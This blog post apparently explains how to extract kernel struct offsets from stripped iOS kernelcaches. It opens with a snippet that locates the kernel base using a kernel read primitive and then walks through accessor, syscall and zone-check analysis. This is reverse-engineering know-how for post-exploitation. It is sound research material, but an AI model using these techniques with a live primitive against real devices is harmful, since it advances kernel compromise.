Background
← Back to blog

You Have a Kernel Read/Write. Not Enough! How to Extract Offsets from XNU Kernelcaches

13 min read

Foreword

Opa334 recently shared a kernel read and write primitive which is similar to the one used in DarkSword malware. I found that it was a perfect occasion for me to try to make it run on one of my testing devices and actually get my hands dirty with kernel exploration. We always hear about kernel exploitation, but rarely get to walk through what it looks like in practice.

Once you have read and write primitives to the kernel, the first step is to read backward until you find the magic number aka the Mach-O binary signature:

uint64_t magic = early_kread64(kernel_base); if (magic == 0x100000cfeedfacf) { printf("[DEBUG] Found Mach-O magic at 0x%llx!\n", kernel_base);

Then you can compute the kernel slide and you are good to go.

I won't detail this, but feel free to check the blog post of MATTEYEUX on DarkSword.

Now the next difficulty is to find the offsets between this magic value and the kernel objects in memory. It is exactly what this post is about.


Introduction

Kernelcaches extracted from IPSW files come without symbols: just raw ARM64 code. Yet, the internal layout of every kernel data structure is recoverable if you know where to look.

Note: you can use blacktop/symbolicator to recover some symbols and make your life easier.

It reminds me of this sentence from J. Levin in the DisARM book:

[...] In fact, the whole premise of the command line tools I demonstrate is to avoid having to use a debugger.

I tried to push hard on that path...

This guide documents a repeatable methodology for extracting struct offsets from stripped kernelcaches. The techniques here were validated against iOS 16.7.12 (iPhone X, build 20H364) using Binary Ninja.

I voluntarily chose not to use the Kernel Development Kit, to force myself to work directly from ARM assembly.


Prerequisites

  • A disassembler with decompiler support (Binary Ninja, IDA Pro + Hex-Rays, or Ghidra)
  • A decrypted kernelcache (I used ipsw for extraction)
  • The XNU open-source release for the closest matching version

Also, the pseudo non-ARM code that I'll share with you, has been modified and simplified for this post.


The Core Principle

The key insight behind this entire methodology is that functions like proc_pid(), vnode_mount(), or kauth_cred_getuid() are wrappers that read the field from a struct. When decompiled, they directly reveal the field's offset.

A stripped kernelcache still retains the names of these exported functions.


Phase 1: Cross-Referencing with XNU Source

The XNU kernel source is partially open. While the iOS build may differ from the published source, the struct layouts are usually very close. Use the source as a map, not as ground truth.

  1. Identify the field name from the accessor function name (e.g., _proc_pidp_pid)
  2. Find the struct definition in the XNU source (e.g., bsd/sys/proc_internal.h)
  3. Use the source to predict which fields exist and roughly where they are
  4. Verify each prediction against the actual binary

Struct definitions in XNU source

StructHeader file
procbsd/sys/proc_internal.h
vnodebsd/sys/vnode_internal.h
socketbsd/sys/socketvar.h
ucredbsd/sys/ucred.h
taskosfmk/kern/task.h
threadosfmk/kern/thread.h
filedescbsd/sys/filedesc.h
fileprocbsd/sys/file_internal.h
fileglobbsd/sys/file_internal.h
mountbsd/sys/mount_internal.h

Apple frequently adds, removes, or reorders fields between iOS versions. Never assume the open-source layout matches exactly. The source tells you what fields exist; the binary tells you where they are.

For example, proc_ro (a read-only split of proc fields) exists in iOS 15.2+ but is not in older XNU source releases. If you only read the source, you would miss this entirely.


Phase 2: Finding Anchor Points

Global variables like allproc, kernproc, and nprocs are stored in the __DATA segment. They are referenced by functions via adrp/ldr instruction pairs. Finding these gives you entry points into the kernel's data structures from a known address.

ARM64 uses page-relative addressing:

adrp x8, 0xfffffff0078b7000 ; load page base ldr x8, [x8, #0x728] ; load from page + offset ; → effective address: 0xfffffff0078b7728

This is a load of the global variable at 0xfffffff0078b7728, which in the context of proc_iterate is allproc.

Kernel slide (KASLR)

All addresses in the static binary are pre-slide. At boot, the kernel is loaded at a random offset (the KASLR slide). On a live device, the actual addresses will be static_address + slide. The offsets between globals remain constant.


Phase 3: Use accessor functions

Search for functions whose names follow the pattern <struct>_<field> or <struct>_get<field>. These are almost always thin accessors.

How to recognize an accessor

An accessor function decompiles to essentially one operation:

// _proc_pid at 0x5c892c return *(arg1 + 0x60);

Or in ARM64 assembly:

ldr w0, [x0, #0x60] ret

That single load instruction tells you: struct proc has p_pid at offset +0x60, and it is a 32-bit integer because the instruction is ldr w0, not ldr x0.

For example, given a target struct, search the function list for its name:

Target structSearch patterns
procproc_pid, proc_ppid, proc_ucred, proc_name, proc_task
vnodevnode_vtype, vnode_mount, vnode_vid, vnode_fsnode, vnode_getname
ucredkauth_cred_getuid, kauth_cred_getgid, kauth_cred_getruid
taskget_task_map, get_bsdtask_info, task_reference
socketfile_socket, soisconnecting, soisconnected
mountvfs_flags, vfs_statfs

Example: Mapping struct ucred

Search for functions containing kauth_cred_get:

_kauth_cred_getuid   → return *(arg1 + 0x18)  →  cr_uid  at +0x18
_kauth_cred_getruid  → return *(arg1 + 0x1C)  →  cr_ruid at +0x1C
_kauth_cred_getsvuid → return *(arg1 + 0x20)  →  cr_svuid at +0x20
_kauth_cred_getgid   → return *(arg1 + 0x28)  →  cr_gid  at +0x28
_kauth_cred_getrgid  → return *(arg1 + 0x68)  →  cr_rgid at +0x68
_kauth_cred_getsvgid → return *(arg1 + 0x6C)  →  cr_svgid at +0x6C

Decompiler vs. disassembly

Decompilers sometimes introduce confusing array indexing notation. When the decompiler shows arg1[0x15], the actual offset depends on what type it infers for arg1. Always verify against the raw disassembly.

For example, arg1[0x15a] in decompilation might mean arg1 + 0x15a * sizeof(element). But the ARM64 instruction will show the real byte offset:

; 0x5c9a40 add x0, x0, #0x579 ; This is the actual offset

When in doubt, read the assembly instructions: they are always the ground truth.


Phase 4: Iterator and Constructor Functions

When accessor functions do not exist for a field (many internal fields are never exported), look at functions that iterate or construct instances of the struct. These functions touch many fields and reveal the overall layout.

The Iterator Pattern

Functions named *_iterate, *_foreach, or *_walk traverse linked lists of kernel objects. They reveal:

  • The global head pointer of the list (a kernel global variable)
  • The list entry offset within the struct. It is often +0x00 for the primary list, but a struct can have multiple list entries at different offsets (e.g. proc.p_list at +0x00 vs proc.p_hash at +0xA0)
  • The count variable (for instance nprocs, in proc_iterate)
  • Various field accesses used for filtering

Example: proc_iterate

This single function revealed:

WhatHowValue
allproc globalFirst data reference loaded as list head0xfffffff0078b7728
zombproc globalSecond list head (conditional on flags)0xfffffff0078b7730
nprocs globalLoop bound variable0xfffffff0078b7d00
p_list.le_nexti = *i (following the list)+0x00
p_pidStored into pidlist array+0x60
p_statCompared against 1 (zombie filter)+0x64
p_listflagReference count manipulation+0x464

The Constructor Pattern

Functions named *create*, *init*, or *alloc* initialize struct fields. They often set fields sequentially, revealing the struct layout in order.

For instance for the socreate_internal routine the socket creation function revealed over 20 struct fields by tracing the sequential stores to the newly allocated socket.

// x21 = newly allocated socket *(x21 + 0x18) = protosw; // so_proto *(x21 + 0x1e0) = kauth_cred; // so_cred *(x21 + 0x1e4) = proc_pid(p); // so_last_pid *(x21 + 0x1e8) = proc_uniqueid(p);// so_last_upid *(x21 + 0x288) = tpidr_el1; // so_background_thread

What to look for in constructors

  • Calls to other accessors functions (e.g., proc_pid()) whose return value is stored
  • memcpy calls that reveal embedded sub-structures
  • str xzr (storing zero) to initialize pointer fields

Phase 5: Syscall Implementations (The Deep Dive)

When neither accessors nor iterators exist for a field, look at the syscall implementations that operate on the struct. Syscalls are the boundary between userspace and kernel space; they must read and write kernel structs to do their work.

Naming conventions

XNU syscall implementations follow the pattern sys_<name> or just <name> for older BSD syscalls:

SyscallFunction nameReveals
chdir(2)sys_chdirfiledesc.fd_cdir offset
chroot(2)chrootfiledesc.fd_rdir offset, chroot flag
open(2)vn_open_authfileproc/fileglob chain
fchdir(2)sys_fchdirfiledesc locking pattern

We could for example try to access some fields of proc via sys_chdir.

The chdir syscall must update the current working directory. Decompiling it reveals:

IORWLockWrite(proc + 0x128); // fd_rw_lock old = *(proc + 0x118); // fd_cdir (old value) *(proc + 0x118) = new_vnode; // fd_cdir = new directory lck_rw_unlock_exclusive(proc + 0x128); if (old != NULL) vnode_rele(old);

This gives us three offsets from one function:

  • proc + 0x118 = fd_cdir
  • proc + 0x128 = fd_rw_lock
  • And confirms the filedesc is inline in the proc (no intermediate pointer)

The inline vs. pointer question

A critical question when mapping any struct: is sub-struct X a pointer to a separate allocation, or is it embedded inline?

The answer comes from how the code accesses it. If you see:

// Pointer to separate struct: fd = *(proc + SOME_OFFSET); // load a pointer cdir = *(fd + 0x18); // dereference through it // Inline (embedded): cdir = *(proc + 0x118); // direct access, no intermediate load

If there is no intermediate pointer load, the sub-struct is inline. This is exactly what we found for filedesc inside proc: the fields are at direct offsets from the proc base.


Phase 6: Zone ID Validation (Identifying Protected Structures)

zone_require() and zone_id_require_ro() are used to validate that pointers belong to the correct memory zone. These checks reveal what zone a struct lives in and whether it is read-only.

Reading zone validation

When you see code like this:

// Inside _proc_ucred: x1 = *(arg1 + 0x18); // load proc_ro pointer zone_id_require_ro_panic(5, x1); // validate it belongs to zone #5

Then we can deduce:

  • proc + 0x18 is a pointer to another struct
  • That struct lives in zone #5
  • Zone #5 is a read-only zone (the _ro suffix)

Zone ID mapping

By collecting all zone_id_require_ro_panic calls across the kernelcache, you can build a complete map of protected zones:

Zone IDStructProtection
3thread_roread-only
5proc_roread-only
7ucredread-only
0x17procRegular zalloc (with zone_require)

Understanding which structures are in read-only zones tells you about the kernel's security architecture. Fields that Apple moved into proc_ro are protected and cannot be modified even with a kernel read/write primitive.


Phase 7: Following Pointer Chains (Graph Traversal)

Individual functions rarely traverse more than one or two pointer hops. But by combining offsets discovered in different functions, you can build paths between objects that have no direct accessor.

For example, there is no socket_get_proc() in the KPI — you cannot find the owning process of a socket with a single function search. But the path exists if you chain discoveries from earlier phases:

  • From socreate_internal (Phase 2): socket + 0x288 stores the creating thread (tpidr_el1)
  • From _current_proc (Phase 1): thread + 0x350 → thread_ro, then thread_ro + 0x10 → proc
socreate_internal        _current_proc         _proc_pid
  found in Phase 2         found in Phase 1      found in Phase 1
        │                        │                     │
        ▼                        ▼                     ▼
  ┌──────────┐  +0x288  ┌────────────┐ +0x350  ┌────────────┐ +0x10  ┌──────────┐ +0x60
  │  socket  │ ───────→ │   thread   │ ──────→ │ thread_ro  │ ─────→ │   proc   │ ─────→ p_pid
  └──────────┘          └────────────┘         └────────────┘        └──────────┘
                         (tpidr_el1)             (zone RO #3)

Neither function knows about the other. But combining them gives you a three-hop path from any socket to its owning process — something you could never find by searching function names alone.

This is where the work becomes cumulative: every offset you confirmed in Phases 1–5 is a building block. The more you have, the more paths you can construct.


Phase 8: Hash Tables and Complex Data Structures

Some kernel lookups use hash tables instead of linked lists. The hash function and table structure can be recovered from the lookup function.

Example: PID hash table from _proc_find

_proc_find takes a PID and returns the corresponding proc. Decompiling it reveals:

  1. A multiplicative hash function applied to the PID
  2. A global hash table pointer at a known address
  3. A mask derived from table metadata
  4. A chain walk through the collision list, comparing PIDs

The hash entry lives at proc + 0xA0, which means the proc struct has a LIST_ENTRY at that offset for chaining in the hash table. The PID comparison happens at hash_entry - 0xA0 + 0x60, confirming p_pid at +0x60 from another angle.


Practical Tips

Function clusters reveal struct regions

If you find proc_pid at +0x60, proc_ppid at +0x20, and proc_pgrpid at +0x28, you know the PID-related fields are clustered in the +0x20–0x68 region. This helps you predict where other related fields might be, and focus your search.

Size hints from zalloc_ro_mut

When zalloc_ro_mut(zone_id, ptr, offset, src, size) is called, the size parameter tells you the total size of the read-only struct. For example, proc_ro is 0x80 bytes.

ARM64 instruction cheat sheet for offset extraction

InstructionWhat it tells you
ldr x0, [x1, #0x60]64-bit load from offset 0x60
ldr w0, [x1, #0x60]32-bit load from offset 0x60
ldrh w0, [x1, #0x70]16-bit load from offset 0x70
ldrb w0, [x1, #0x64]8-bit load from offset 0x64
str x2, [x1, #0x18]64-bit store at offset 0x18
add x0, x1, #0x579Compute address at offset 0x579 (often for strings/arrays)
stp x2, x3, [x1, #0x50]Store pair: 64-bit values at +0x50 and +0x58
adrp x8, PAGE then ldr x8, [x8, #OFF]Global variable load at PAGE+OFF
mrs x0, tpidr_el1Load current thread pointer

Field size from instruction width

The ARM64 instruction tells you the field size:

  • ldr x / str x → 8 bytes (pointer, uint64)
  • ldr w / str w → 4 bytes (int32, uint32, pid_t)
  • ldrh / strh → 2 bytes (uint16, short)
  • ldrb / strb → 1 byte (uint8, char, bool)

Take aways

  • Jonathan Levin, *OS Internals (volumes I–III): the definitive reference on XNU internals
  • Apple XNU source — opensource.apple.com